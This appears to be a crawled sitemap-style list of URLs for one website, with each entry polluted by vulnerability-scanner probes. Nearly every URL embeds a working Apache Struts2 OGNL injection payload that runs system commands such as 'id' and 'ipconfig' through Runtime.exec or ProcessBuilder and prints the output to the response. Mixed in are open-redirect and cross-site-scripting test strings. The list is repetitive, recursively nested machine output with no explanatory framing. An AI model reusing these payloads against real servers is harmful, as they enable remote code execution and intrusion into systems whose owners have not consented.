http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=%3c979231%20x%3d913267243%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ikjnn? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm68382%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem16545?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=osm16917%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem88519? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm33449%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem58528?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=xsstestb71? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?=osm67269%c0%beo1%c0%bco2a%90bcoem58953 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 